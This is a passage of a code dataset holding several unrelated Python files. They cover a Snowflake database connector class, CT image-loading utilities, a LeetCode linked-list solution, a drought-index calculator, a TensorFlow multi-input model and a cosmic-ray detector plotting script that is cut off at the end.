connection instance\n\n cursor : dbapi.cursor\n DBAPI cursor instance\n\n Raises\n ------\n CredentialsError\n Database credentials are not provided or valid\n\n S3Error\n Error initializing AWS Session (ex: invalid profile)\n\n S3CredentialsError\n Issue with AWS credentials\n\n S3InitializationError\n Issue initializing S3 session\n \"\"\"\n\n def __init__(\n self, profile=None, kms_key=None, dbapi=None, config_yaml=None, **kwargs\n ):\n try:\n S3.__init__(self, profile, kms_key)\n except S3CredentialsError:\n logger.warning(\n \"S3 credentials were not found. S3 functionality is disabled\"\n )\n logger.warning(\"Only internal stages are available\")\n Database.__init__(self, dbapi, config_yaml, **kwargs)\n\n def connect(self):\n \"\"\"Creates a connection to the Snowflake cluster by\n setting the values of the ``conn`` and ``cursor`` attributes.\n\n Raises\n ------\n DBError\n If there is a problem establishing a connection to Snowflake.\n \"\"\"\n super(Snowflake, self).connect()\n\n if self.connection.get(\"warehouse\") is not None:\n self.execute(\"USE WAREHOUSE {0}\".format(self.connection[\"warehouse\"]))\n if self.connection.get(\"database\") is not None:\n self.execute(\"USE DATABASE {0}\".format(self.connection[\"database\"]))\n if self.connection.get(\"schema\") is not None:\n self.execute(\"USE SCHEMA {0}\".format(self.connection[\"schema\"]))\n\n def upload_to_internal(\n self, local, stage, parallel=4, auto_compress=True, overwrite=True\n ):\n \"\"\"\n Upload file(s) to a internal stage via the ``PUT`` command.\n\n Parameters\n ----------\n local : str\n The local directory path to the file to upload. Wildcard characters (``*``, ``?``) are\n supported to enable uploading multiple files in a directory. Otherwise it must be the\n absolute path.\n\n stage : str\n Internal stage location to load the file.\n\n parallel : int, optional\n Specifies the number of threads to use for uploading files.\n\n auto_compress : bool, optional\n Specifies if Snowflake uses gzip to compress files during upload.\n If ``True``, the files are compressed (if they are not already compressed).\n if ``False``, the files are uploaded as-is.\n\n overwrite : bool, optional\n Specifies whether Snowflake overwrites an existing file with the same name during upload.\n If ``True``, existing file with the same name is overwritten.\n if ``False``, existing file with the same name is not overwritten.\n \"\"\"\n local_uri = PurePath(local).as_posix()\n self.execute(\n \"PUT 'file://{0}' {1} PARALLEL={2} AUTO_COMPRESS={3} OVERWRITE={4}\".format(\n local_uri, stage, parallel, auto_compress, overwrite\n )\n )\n\n def download_from_internal(self, stage, local=None, parallel=10):\n \"\"\"\n Download file(s) from a internal stage via the ``GET`` command.\n\n Parameters\n ----------\n stage : str\n Internal stage location to load the file.\n\n local : str, optional\n The local directory path where files will be downloaded to. Defualts to the current\n working directory (``os.getcwd()``). Otherwise it must be the absolute path.\n\n parallel : int, optional\n Specifies the number of threads to use for downloading files.\n \"\"\"\n if local is None:\n local = os.getcwd()\n local_uri = PurePath(local).as_posix()\n self.execute(\n \"GET {0} 'file://{1}' PARALLEL={2}\".format(stage, local_uri, parallel)\n )\n\n def copy(\n self, table_name, stage, file_type=\"csv\", format_options=None, copy_options=None\n ):\n \"\"\"Executes the ``COPY INTO `` command to load CSV files from a stage into\n a Snowflake table. If ``file_type == csv`` and ``format_options == None``, ``format_options``\n will default to: ``[\"FIELD_DELIMITER='|'\", \"SKIP_HEADER=0\"]``\n\n Parameters\n ----------\n table_name : str\n The Snowflake table name which is being loaded. Must be fully qualified:\n `.`\n\n stage : str\n Stage location of the load file. This can be a internal or external stage\n\n file_type : str\n The file type. One of ``csv``, ``json``, or ``parquet``\n\n format_options : list\n List of strings of format options to provide to the ``COPY INTO`` command. The options\n will typically be in the format of ``[\"a=b\", \"c=d\"]``\n\n copy_options : list\n List of strings of copy options to provide to the ``COPY INTO`` command.\n\n Raises\n ------\n DBError\n If there is a problem executing the COPY command, or a connection\n has not been initalized.\n \"\"\"\n if not self._is_connected():\n raise DBError(\"No Snowflake connection object is present.\")\n\n if file_type not in COPY_FORMAT_OPTIONS:\n raise ValueError(\n \"Invalid file_type. Must be one of {0}\".format(\n list(COPY_FORMAT_OPTIONS.keys())\n )\n )\n\n if format_options is None and file_type == \"csv\":\n format_options = [\"FIELD_DELIMITER='|'\", \"SKIP_HEADER=0\"]\n\n format_options_text = combine_options(format_options)\n copy_options_text = combine_options(copy_options)\n base_copy_string = (\n \"COPY INTO {0} FROM '{1}' \" \"FILE_FORMAT = (TYPE='{2}' {3}) {4}\"\n )\n try:\n sql = base_copy_string.format(\n table_name, stage, file_type, format_options_text, copy_options_text\n )\n self.execute(sql, commit=True)\n\n except Exception as e:\n logger.error(\"Error running COPY on Snowflake. err: %s\", e)\n raise DBError(\"Error running COPY on Snowflake.\")\n\n def unload(\n self,\n stage,\n table_name,\n file_type=\"csv\",\n format_options=None,\n header=False,\n copy_options=None,\n ):\n \"\"\"Executes the ``COPY INTO `` command to export a query/table from\n Snowflake to a stage. If ``file_type == csv`` and ``format_options == None``, ``format_options``\n will default to: ``[\"FIELD_DELIMITER='|'\"]``\n\n Parameters\n ----------\n stage : str\n Stage location (internal or external) where the data files are unloaded\n\n table_name : str\n The Snowflake table name which is being unloaded. Must be fully qualified:\n ``.``\n\n file_type : str\n The file type. One of ``csv``, ``json``, or ``parquet``\n\n format_options : list\n List of strings of format options to provide to the ``COPY INTO`` command.\n\n header : bool, optional\n Boolean flag if header is included in the file(s)\n\n copy_options : list\n List of strings of copy options to provide to the ``COPY INTO`` command.\n\n Raises\n ------\n DBError\n If there is a problem executing the UNLOAD command, or a connection\n has not been initalized.\n \"\"\"\n if not self._is_connected():\n raise DBError(\"No Snowflake connection object is present\")\n\n if file_type not in COPY_FORMAT_OPTIONS:\n raise ValueError(\n \"Invalid file_type. Must be one of {0}\".format(\n list(UNLOAD_FORMAT_OPTIONS.keys())\n )\n )\n\n if format_options is None and file_type == \"csv\":\n format_options = [\"FIELD_DELIMITER='|'\"]\n\n format_options_text = combine_options(format_options)\n copy_options_text = combine_options(copy_options)\n base_unload_string = (\n \"COPY INTO {0} FROM {1} \" \"FILE_FORMAT = (TYPE='{2}' {3}) HEADER={4} {5}\"\n )\n\n try:\n sql = base_unload_string.format(\n stage,\n table_name,\n file_type,\n format_options_text,\n header,\n copy_options_text,\n )\n self.execute(sql, commit=True)\n except Exception as e:\n logger.error(\"Error running UNLOAD on Snowflake. err: %s\", e)\n raise DBError(\"Error running UNLOAD on Snowflake.\")\n\n def insert_dataframe_to_table(\n self, dataframe, table_name, columns=None, create=False, metadata=None\n ):\n \"\"\"\n Insert a Pandas dataframe to an existing table or a new table. In newer versions of the\n python snowflake connector (v2.1.2+) users can call the ``write_pandas`` method from the cursor\n directly, ``insert_dataframe_to_table`` is a custom implementation and does not use\n ``write_pandas``. Instead of using ``COPY INTO`` the method builds a list of tuples to\n insert directly into the table. There are also options to create the table if it doesn't\n exist and use your own metadata. If your data is significantly large then using\n ``COPY INTO
`` is more appropriate.\n\n Parameters\n ----------\n dataframe: Pandas Dataframe\n The pandas dataframe which needs to be inserted.\n\n table_name: str\n The name of the Snowflake table which is being inserted.\n\n columns: list, optional\n The list of columns which will be uploaded.\n\n create: bool, optional\n Boolean flag if a new table need to be created and insert to.\n\n metadata: dictionary, optional\n If metadata==None, it will be generated based on data\n \"\"\"\n\n import pandas as pd\n\n if columns:\n dataframe = dataframe[columns]\n\n all_columns = columns or list(dataframe.columns)\n column_sql = \"(\" + \",\".join(all_columns) + \")\"\n string_join = \"(\" + \",\".join([\"%s\"] * len(all_columns)) + \")\"\n\n # create a list of tuples for insert\n to_insert = []\n for row in dataframe.itertuples(index=False):\n none_row = tuple([None if pd.isnull(val) else str(val) for val in row])\n to_insert.append(none_row)\n\n if not create and metadata:\n logger.warning(\"Metadata will not be used because create is set to False.\")\n\n if create:\n if not metadata:\n logger.info(\"Metadata is missing. Generating metadata ...\")\n metadata = find_column_type(dataframe, \"snowflake\")\n logger.info(\"Metadata is complete. Creating new table ...\")\n\n create_join = (\n \"(\"\n + \",\".join(\n [\n list(metadata.keys())[i] + \" \" + list(metadata.values())[i]\n for i in range(len(metadata))\n ]\n )\n + \")\"\n )\n column_sql = \"(\" + \",\".join(list(metadata.keys())) + \")\"\n create_query = \"CREATE TABLE {table_name} {create_join}\".format(\n table_name=table_name, create_join=create_join\n )\n self.execute(create_query)\n logger.info(\"New table has been created\")\n\n insert_query = \"\"\"INSERT INTO {table_name} {columns} VALUES {values}\"\"\".format(\n table_name=table_name, columns=column_sql, values=string_join\n )\n\n logger.info(\"Inserting records...\")\n self.execute(insert_query, params=to_insert, many=True)\n logger.info(\"Table insertion has completed\")\n\n def to_dataframe(self, size=None):\n \"\"\"Return a dataframe of the last query results. This is just a convenience method. This\n method overrides the base classes implementation in favour for the snowflake connectors\n built-in ``fetch_pandas_all`` when ``size==None``. If ``size != None`` then we will continue\n to use the existing functionality where we iterate through the cursor and build the\n dataframe.\n\n Parameters\n ----------\n size : int, optional\n Chunk size to fetch. Defaults to None.\n\n Returns\n -------\n pandas.DataFrame\n Dataframe with lowercase column names. Returns None if no fetched\n result.\n \"\"\"\n if size is None and self.cursor._query_result_format == \"arrow\":\n return self.cursor.fetch_pandas_all()\n else:\n return super(Snowflake, self).to_dataframe(size)\n","repo_name":"capitalone/locopy","sub_path":"locopy/snowflake.py","file_name":"snowflake.py","file_ext":"py","file_size_in_byte":16522,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"52"} +{"seq_id":"36559422760","text":"import glob\nimport os\nimport random\nimport re\nimport time\nfrom contextlib import contextmanager\nfrom pathlib import PurePath ,Path\n\nimport imageio\nimport numpy as np\nimport torch\nfrom cv2 import COLOR_GRAY2RGB, VideoWriter, VideoWriter_fourcc, cvtColor\n\n\ndef load_projections(walnut_path, orbit_id, angular_sub_sampling=1):\n \"\"\"Loads all CB projections from one walnut/orbit pair with associated info for reconstruction\"\"\"\n\n def flip_trans(image):\n \"\"\"Re-orients projections correctly\"\"\"\n return np.transpose(np.flipud(image))\n\n\n print(f\"Loading: {walnut_path}...\")\n\n proj_files = sorted(glob.glob(os.path.join(walnut_path, 'Projections', f'tubeV{orbit_id}', 'scan_*.tif'))) \n flat_files = sorted(glob.glob(os.path.join(walnut_path, 'Projections', f'tubeV{orbit_id}', 'io*.tif')))\n dark_file = os.path.join(walnut_path, 'Projections', f'tubeV{orbit_id}', 'di000000.tif')\n vec_file = os.path.join(walnut_path, 'Projections', f'tubeV{orbit_id}', 'scan_geom_corrected.geom')\n\n projections = np.stack([flip_trans(imageio.imread(file)) for file in proj_files], axis=0)\n\n dark_field = flip_trans(imageio.imread(dark_file))\n flat_field = np.mean(np.stack([flip_trans(imageio.imread(file)) for file in flat_files], axis=0), axis=0)\n\n # first and last are projections under the same angle\n projs_idx = range(0, 1200, angular_sub_sampling)\n vecs = np.loadtxt(vec_file)\n\n # Projections acquired in reverse order of vecs\n projections = projections[projs_idx][::-1]\n vecs = vecs[projs_idx]\n\n return projections, dark_field, flat_field, vecs\n\n\ndef rescale_before_saving(func):\n \"\"\"Decorator for imageio.imsave & imageio.mimsave functions, rescales float \n images to uint8 range and changes type to uint8 to prevent warning messages\"\"\"\n\n def rescale(*args, **kwargs):\n \n def normalize(image):\n if image.max()-image.min() == 0:\n return np.zeros_like(image)\n\n return (image-image.min()) / (image.max()-image.min())\n\n\n im = kwargs.pop('im', kwargs.pop('ims', args[1]))\n uri = kwargs.pop('uri', args[0])\n \n if isinstance(uri, PurePath):\n if uri.suffix in ['.tif', '.tiff']:\n return func(uri, im, **kwargs)\n \n elif uri.split('.')[-1] in ['tif', 'tiff']:\n return func(uri, im, **kwargs)\n\n # Normalizing to [0,1] then rescaling to uint\n im = (normalize(im) *255).astype('uint8')\n\n return func(uri, im, **kwargs)\n\n # if im.min() >= 0:\n # if im.max() <= 1: \n # # Resclaing [0,1] floats to uint8\n # im = (im *255).astype('uint8')\n\n # elif im.max() <= 255:\n # # Matches type to avoid warnings\n # im = im.astype('uint8')\n \n # elif im.min() >= -1 and im.max() <= 1:\n # # Rescaling [-1,1] floats to uint8\n # im = ((im +1) *127.5).astype('uint8')\n \n # return func(uri, im, **kwargs)\n\n return rescale\n\n@rescale_before_saving\ndef imsave(*args, **kwargs):\n return imageio.imsave(*args, **kwargs)\n\n@rescale_before_saving\ndef mimsave(*args, **kwargs):\n return imageio.mimsave(*args, **kwargs)\n\n\ndef save_vid(filename, image_stack, codec='MJPG', fps=30, **kwargs):\n \"\"\"Saves image stack as a video file (better compression than gifs)\n Args:\n -----\n filename (str): path to savefile\n image_stack (np.ndarray): image stack in [z/t,x,y,c] format\n codec (str): opencv fourcc compatible codec, 4 char long str\n \"\"\"\n \n fourcc = VideoWriter_fourcc(*codec)\n out = VideoWriter(filename, fourcc, fps, image_stack.shape[1:3][::-1], **kwargs)\n\n # Rescale for video compatible format\n if not image_stack.dtype is np.uint8:\n image_stack = ((image_stack-image_stack.min()) / (image_stack.max()-image_stack.min()) *255).astype('uint8')\n # image_stack = np.clip(image_stack *255, 0,255).astype('uint8')\n\n for i in range(image_stack.shape[0]):\n if image_stack.shape[-1] == 1:\n out.write(cvtColor(image_stack[i], COLOR_GRAY2RGB))\n\n elif image_stack.shape[-1] == 3:\n out.write(image_stack[i])\n\n else:\n raise ValueError(f\"Wrong number of channels for frame, should be 1 or 3, is {image_stack[i].shape[-1]}\")\n\n out.release()\n\n\ndef timeit(func):\n \"\"\"Decorator to monitor computing time\"\"\"\n\n f_name = ' '.join(func.__name__.split('_'))\n\n def timeit_wrapper(*args, **kwargs):\n start_time = time.time()\n print(f'Starting {f_name}...', end='', flush=True)\n return_values = func(*args, **kwargs)\n print(f\"\\tDone! (took {time.time()-start_time:.2f}s)\", flush=True)\n \n return return_values\n\n return timeit_wrapper\n \n\n#TODO: unit test for _nat_sort\ndef _nat_sort(path):\n \"\"\"Natural sorting of paths, [0,1,10,2] -> [0,1,2,10]\"\"\"\n if isinstance(path, PurePath):\n return [int(c) if c.isdigit() else c for c in re.split(\"([0-9]+)\", path.as_posix())]\n \n return [int(c) if c.isdigit() else c for c in re.split(\"([0-9]+)\", path)]\n\n\ndef load_walnut_ds():\n\n ds_path = '/data/fdelberghe/FastWalnuts2/'\n walnut_folders = [folder for folder in sorted(os.listdir(ds_path), key=_nat_sort) \n if os.path.isdir(os.path.join(ds_path, folder))]\n\n walnuts_agd_paths = [sorted(glob.glob(os.path.join(ds_path + f\"{folder}/agd_*.tif\")), key=_nat_sort) \n for folder in walnut_folders]\n walnuts_fdk_paths = [\n [sorted(glob.glob(os.path.join(ds_path + f\"{folder}/fdk_orbit{orbit_id:02d}*.tif\")),\n key=_nat_sort) for orbit_id in [1,2,3]] for folder in walnut_folders]\n\n return walnuts_agd_paths, walnuts_fdk_paths\n\n\ndef load_foam_phantom_ds():\n\n ds_path = '/data/fdelberghe/FoamPhantoms/'\n phantom_folders = [folder for folder in sorted(os.listdir(ds_path), key=_nat_sort) \n if os.path.isdir(os.path.join(ds_path, folder))]\n\n phantom_agd_paths = [\n sorted(glob.glob(os.path.join(ds_path + f\"{folder}/phantom_true_*.tif\")), key=_nat_sort)\n for folder in phantom_folders]\n\n phantom_fdk_paths = [\n [sorted(glob.glob(os.path.join(ds_path + f\"{folder}/phantom_fdk_*_o{orbit_id}*.tif\")), key=_nat_sort)\n for orbit_id in [1,2,3]] for folder in phantom_folders]\n\n return phantom_agd_paths, phantom_fdk_paths\n\n\ndef load_phantom_ds(folder_path='PhantomsRadial/'):\n\n ds_path = Path('/data/fdelberghe/') /folder_path\n\n phatom_folders = sorted(ds_path.glob('*/'), key=_nat_sort)\n\n phantom_truth_paths = [sorted(folder.glob('CT_target_*.tif'), key=_nat_sort) for folder in phatom_folders]\n phantom_fdk_paths = [[sorted(folder.glob(f'CB_source_orbit{orbit_id:0>2d}_*.tif'), key=_nat_sort)\n for orbit_id in [1,2,3]] for folder in phatom_folders]\n\n return phantom_truth_paths, phantom_fdk_paths\n\n\ndef set_seed(func):\n \"\"\"Decorator to set random seed before function calls for deterministic behavior\"\"\"\n\n def _set_seed_wrapper(*args, seed=0, **kwargs):\n random.seed(seed)\n return func(*args, **kwargs)\n \n return _set_seed_wrapper\n\n@set_seed\ndef split_data(input_ims, target_ims, frac=7/42, verbose=True):\n \"\"\"Splits data into train, val and test sets, as list(tuple(input, target))\"\"\"\n\n n_test = n_val = max(1, int(np.round(len(target_ims) *frac)))\n \n # shuffle order of (input, target) pairs\n zipped_ims = random.sample([\n (i, input_im, target_im) for i, (input_im, target_im) in enumerate(zip(input_ims, target_ims))\n ], len(target_ims))\n\n ids_te, *test_set = tuple(zip(*zipped_ims[:n_test]))\n ids_val, *val_set = tuple(zip(*zipped_ims[n_test:n_test+n_val]))\n ids_tr, *train_set = tuple(zip(*zipped_ims[n_test+n_val:]))\n\n if verbose:\n print(f\"Sample indices for test: {ids_te}, validation: {ids_val}, training: {ids_tr}\")\n\n return test_set, val_set, train_set\n\n@set_seed\ndef split_data_CV(input_ims, target_ims, frac=1/4, verbose=True):\n \"\"\"Creates a generator for data split for cross validation, yields train, val and test sets, as list(tuple(input, target))\"\"\"\n \n if isinstance(frac, (tuple, list)):\n n_test = int(np.round(len(target_ims) *frac[0]))\n n_val = max(1, int(np.round(len(target_ims) *frac[1])))\n\n else:\n n_test = n_val = max(1, int(np.round(len(target_ims) *frac)))\n\n # shuffle order of (input, target) pairs\n zipped_ims = random.sample([\n (i, input_im, target_im) for i, (input_im, target_im) in enumerate(zip(input_ims, target_ims))\n ], len(target_ims))\n\n if n_test <= 0:\n ids_te, test_set = None, None\n else:\n ids_te, *test_set = tuple(zip(*zipped_ims[:n_test]))\n zipped_ims = zipped_ims[n_test:]\n\n for i in range(len(zipped_ims)):\n val_idx = set([(j+i) %len(zipped_ims) for j in range(n_val)])\n tr_idx = set(range(len(zipped_ims))) -val_idx\n\n ids_val, *val_set = tuple(zip(*[zipped_ims[j] for j in val_idx]))\n ids_tr, *train_set = tuple(zip(*[zipped_ims[j] for j in tr_idx]))\n\n if verbose:\n print(f\"Sample indices for test: {ids_te}, validation: {ids_val}, training: {ids_tr}\")\n\n yield test_set, val_set, train_set\n","repo_name":"FlorianDelberghe/CBCT_artifact_reduction","sub_path":"src/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9327,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"7212502007","text":"# -*- coding: utf-8 -*-\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def isPalindrome(self, head: ListNode) -> bool:\n fast = slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n\n if fast:\n # 奇数个节点\n slow = slow.next\n\n tail = self.reverseList(slow)\n while head and tail:\n if head.val != tail.val:\n return False\n head = head.next\n tail = tail.next\n return True\n\n def reverseList(self, head: ListNode) -> ListNode:\n \"\"\" 翻转链表 \"\"\"\n prev = None\n while head:\n tmp = head.next\n head.next = prev\n prev = head\n head = tmp\n return prev\n\n def makeList(self, nums) -> ListNode:\n head = ListNode()\n cur = head\n for n in nums:\n cur.next = ListNode(n)\n cur = cur.next\n return head.next\n\n\nif __name__ == \"__main__\":\n s = Solution()\n l1 = s.makeList([1, 2, 3, 4, 5])\n s.isPalindrome(l1)\n l2 = s.makeList([1, 2, 3, 4])\n s.isPalindrome(l2)","repo_name":"HQ409/Leetcode","sub_path":"0234.palindrome-linked-list/python/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13375523172","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 23 13:38:35 2023\n\n@author: Gary\n\"\"\"\n\nimport numpy as np\nfrom scipy import stats as st\n\n\"\"\"\n# Standardized Index for SPI, SSI, SGI, etc.\n\"\"\"\n\nclass Standardized_Index:\n def __init__(self, data,time):\n # 滾動式調整移動平均\n data_ma = data.rolling(time,center=False).mean() # rolling 計算時間窗口\n\n # 移動平均取natural log\n data_log = np.log(data_ma + 1e-5) # 1e-5 為改變浮點數精度, 解決0的問題\n data_log[ np.isinf(data_log) == True] = np.nan # 更改值為NaN, 因為log0無意義, 會出現error\n \n # 全部的移動平均的平均, 忽略nan\n mu_data_ma = np.nanmean((data_ma))\n \n # 取log後的移動平均總合\n sum_log = np.nansum(data_log)\n\n # 計算 Gamma distrubution 參數\n n = len(data_log[time-1:]) # 資料大小\n A = np.log(mu_data_ma + 1e-5) - (sum_log/n) # 計算 A\n alpha = (1/(4*A))*(1+(1+((4*A)/3))**0.5) # 計算 alpha (a)\n beta = mu_data_ma/alpha # 計算 beta (scale) \n \n # 根據 Gamma distrubution 求取累積機率函數(Cumulative distribution function, CDF)\n gamma = st.gamma.cdf(data_ma + 1e-5, a=alpha, scale=beta)\n \n # 再轉換為標準常態分布 (Inverse of CDF)\n # Percent point function (inverse of cdf — percentiles).\n norm_spi = st.norm.ppf(gamma, loc=0, scale=1) # ppf是將CDF轉換的語法, loc是平均值, scale是標準差\n \n self.moving_averaged_data = data_ma\n self.natural_log_of_moving_averaged_data = data_log\n self.mean_of_moving_averaged_data = mu_data_ma\n self.sum_of_natural_log = sum_log\n self.count_of_moving_averaged_data = n\n self.A = A\n self.alpha = alpha\n self.beta = beta\n self.gamma_distribution = gamma\n self.spi = norm_spi\n","repo_name":"weegary/spi","sub_path":"SPI.py","file_name":"SPI.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"631688517","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 24 15:57:02 2019\n\n@author: Wei-Hsiang, Shen\n\"\"\"\n\nimport tensorflow as tf\nimport tensorflow.keras.layers as layers\n\n\ndef Get_Model():\n inputs_stamp_image = tf.keras.Input(shape=(50,50,3), name='stamp_img')\n inputs_address = tf.keras.Input(shape=(None,), name='address')\n inputs_color = tf.keras.Input(shape=(4,), name='color') # categorical inputs should be one-hot coded\n\n # Stamp (images data)\n features_stamp = layers.Conv2D(8,3)(inputs_stamp_image)\n features_stamp = layers.MaxPool2D()(features_stamp)\n features_stamp = layers.Flatten()(features_stamp)\n\n # Address (sequence data)\n num_words = 10000\n features_address = layers.Embedding(num_words, 64)(inputs_address)\n features_address = layers.LSTM(128)(features_address)\n\n # Color (tabular data)\n features_color = layers.Dense(10)(inputs_color)\n\n # Merge all features into a single vector via concatenation\n features_all = tf.concat([features_stamp, features_address, features_color], axis=-1)\n\n # Predict price\n price_prediction = layers.Dense(10)(features_all)\n price_prediction = layers.Dense(1, activation='relu', name='price')(price_prediction)\n\n # Predict class\n class_prediction = layers.Dense(20)(features_all)\n class_prediction = layers.Dense(10, activation='softmax', name='class')(class_prediction)\n\n # Instantiate an end-to-end model predicting both priority and department\n model = tf.keras.Model(inputs=[inputs_stamp_image, inputs_address, inputs_color],\n outputs=[price_prediction, class_prediction])\n\n return model\n\nif __name__ == '__main__':\n model = Get_Model()\n model.summary()\n tf.keras.utils.plot_model(model, 'Post_Office_Network.png', show_shapes=True)\n\n # We can assign different loss to each output, and also different weights to each loss\n model.compile(optimizer=tf.keras.optimizers.RMSprop(1e-3),\n loss={'price': 'mse', # specified by output name\n 'class': 'categorical_crossentropy'},\n loss_weights=[1., 0.2])\n\n\n\n\n\n","repo_name":"Rabbit1010/TensorFlow2.0-Tutorial","sub_path":"Topic 2/ticket_system_example.py","file_name":"ticket_system_example.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5633259497","text":"import numpy as np\nimport tajava.reader.fd.sdrecon_signal\nimport tajava.reader.fd.hybridrecon\nimport plotly.express as px\nimport plotly.graph_objs as go\nimport pathlib\nimport numpy_utility as npu\n\n\ncoordinate_path = pathlib.Path(__file__).resolve().parent / \"coordinate\"\n\nsd_positions = npu.to_tidy_data({\n \"TALE SD\": np.loadtxt(coordinate_path / \"talesd.txt\", dtype=[(\"lid\", \"i4\"), (\"x\", \"f8\"), (\"y\", \"f8\"), (\"z\", \"f8\")]),\n \"NICHE\": np.loadtxt(coordinate_path / \"niche.txt\", dtype=[(\"lid\", \"i4\"), (\"x\", \"f8\"), (\"y\", \"f8\"), (\"z\", \"f8\")]),\n \"TA SD\": np.loadtxt(coordinate_path / \"tasd.txt\", dtype=[(\"lid\", \"i4\"), (\"x\", \"f8\"), (\"y\", \"f8\"), (\"z\", \"f8\")]),\n}, \"SD Type\", (\"lid\", \"x\", \"y\", \"z\"))\nsd_positions[\"x\"] *= 1e-3\nsd_positions[\"y\"] *= 1e-3\n\nmd_tale_fd_pos = np.loadtxt(coordinate_path / \"MD-TALE_site.dat\", dtype=[(\"x\", \"f8\"), (\"y\", \"f8\"), (\"z\", \"f8\")])\nmd_tower_pos = np.loadtxt(coordinate_path / \"mdtower.txt\", dtype=[(\"lid\", \"i4\"), (\"x\", \"f8\"), (\"y\", \"f8\"), (\"z\", \"f8\")])\nmd_tower_pos[\"x\"] *= 1e-3\nmd_tower_pos[\"y\"] *= 1e-3\n\n\ndef _plot(sdrecon_signal, hybridrecon_data, auto_open, show_id=False):\n fig = px.scatter(\n sd_positions, x=\"x\", y=\"y\", text=\"lid\", color=\"SD Type\",\n labels={\"x\": \"X (West to East)\", \"y\": \"Y (South to North)\", \"lid\": \"SD ID\"},\n color_discrete_sequence=[\"#666666\"]\n )\n if show_id == np.False_:\n fig.update_traces(mode=\"markers\")\n fig.update_traces(marker_symbol=\"square-open\")\n fig.update_traces(marker_size=10, selector=dict(name=\"NICHE\"))\n fig.update_traces(marker_size=12, selector=dict(name=\"TALE SD\"))\n fig.update_traces(marker_size=14, selector=dict(name=\"TA SD\"))\n fig.update_xaxes(scaleanchor=\"y\", scaleratio=1, constrain=\"domain\", ticksuffix=\" km\")\n fig.update_yaxes(ticksuffix=\" km\")\n\n fig.add_trace(\n go.Scatter(\n name=\"MD-TALE FD\",\n text=\"MD-TALE FD\",\n mode=\"markers+text\",\n x=md_tale_fd_pos[\"x\"], y=md_tale_fd_pos[\"y\"],\n marker=dict(symbol=\"star\", size=15, line_width=0, color=\"#666666\"),\n textposition=\"middle left\"\n )\n )\n\n fig.add_trace(\n go.Scattergl(\n name=\"Hit Detectors\",\n mode=\"markers\",\n x=sdrecon_signal[\"x\"] * 1e-5,\n y=sdrecon_signal[\"y\"] * 1e-5,\n marker=dict(\n line_width=0,\n color=(sdrecon_signal[\"t\"] - sdrecon_signal[\"t\"].min()) * 1000,\n colorbar=dict(\n title=\"Time [ns]\"\n ),\n colorscale=\"Portland\",\n sizemode=\"area\",\n size=sdrecon_signal[\"Q\"],\n sizeref=2 * sdrecon_signal[\"Q\"].max() / (20 ** 2),\n # sizemin=5,\n opacity=1\n ),\n # hovertemplate=get_hover_template(npe=True, t=True)\n )\n )\n\n for hybridrecon_row in hybridrecon_data:\n azimuth = np.deg2rad(180 - (hybridrecon_row[\"azimuth\"] - 90))\n arrow = 0.2 * np.array([np.cos(azimuth), np.sin(azimuth)])\n arrow_perp = 0.1 * np.array([np.cos(azimuth + np.pi/2), np.sin(azimuth + np.pi/2)])\n\n color = \"magenta\" if hybridrecon_row[\"is_true\"] else \"black\"\n\n fig.add_trace(\n go.Scattergl(\n name=\"{} Core Position\".format(\"True\" if hybridrecon_row[\"is_true\"] else \"Reconstructed\"),\n x=[hybridrecon_row[\"x\"]], y=[hybridrecon_row[\"y\"]],\n marker_color=color,\n opacity=0\n )\n )\n add_arrow_shape(\n fig,\n x0=hybridrecon_row[\"x\"] - arrow[0] * 0.5, x1=hybridrecon_row[\"x\"] + arrow[0] * 0.5,\n y0=hybridrecon_row[\"y\"] - arrow[1] * 0.5, y1=hybridrecon_row[\"y\"] + arrow[1] * 0.5,\n line=dict(color=color, width=3)\n )\n fig.add_shape(\n type=\"line\",\n x0=hybridrecon_row[\"x\"] - arrow_perp[0] * 0.5, x1=hybridrecon_row[\"x\"] + arrow_perp[0] * 0.5,\n y0=hybridrecon_row[\"y\"] - arrow_perp[1] * 0.5, y1=hybridrecon_row[\"y\"] + arrow_perp[1] * 0.5,\n line=dict(color=color, width=3)\n )\n\n fig.update_traces(showlegend=False)\n fig.update_xaxes(range=(-8, -6))\n fig.update_yaxes(range=(17.75, 19.75))\n\n traces = [trace for trace in fig.data if len(trace.marker.colorbar.to_plotly_json()) > 0]\n fig.layout.xaxis.domain = (0, 1 - 0.1 * len(traces))\n for i, trace in enumerate(traces):\n trace.marker.colorbar.x = 1 - 0.1 * i\n trace.marker.colorbar.y = 0.5\n trace.marker.colorbar.xanchor = \"center\"\n trace.marker.colorbar.yanchor = \"middle\"\n\n if auto_open:\n fig.show()\n\n return fig\n\n\ndef add_arrow_shape(fig, x0, y0, x1, y1, **kwargs):\n theta = np.arctan2(y1 - y0, x1 - x0)\n arrow_length = np.sqrt((x1 - x0) ** 2 + (y1 - y0) ** 2)\n right_arrow = -0.25 * arrow_length * np.array([np.cos(theta - np.deg2rad(30)), np.sin(theta - np.deg2rad(50))])\n left_arrow = -0.25 * arrow_length * np.array([np.cos(theta + np.deg2rad(30)), np.sin(theta + np.deg2rad(50))])\n\n fig.add_shape(\n type=\"line\",\n x0=x0, y0=y0, x1=x1, y1=y1,\n editable=False,\n **kwargs\n )\n fig.add_shape(\n type=\"line\",\n x0=x1, y0=y1, x1=x1 + right_arrow[0], y1=y1 + right_arrow[1],\n editable=False,\n **kwargs\n )\n fig.add_shape(\n type=\"line\",\n x0=x1, y0=y1, x1=x1 + left_arrow[0], y1=y1 + left_arrow[1],\n editable=False,\n **kwargs\n 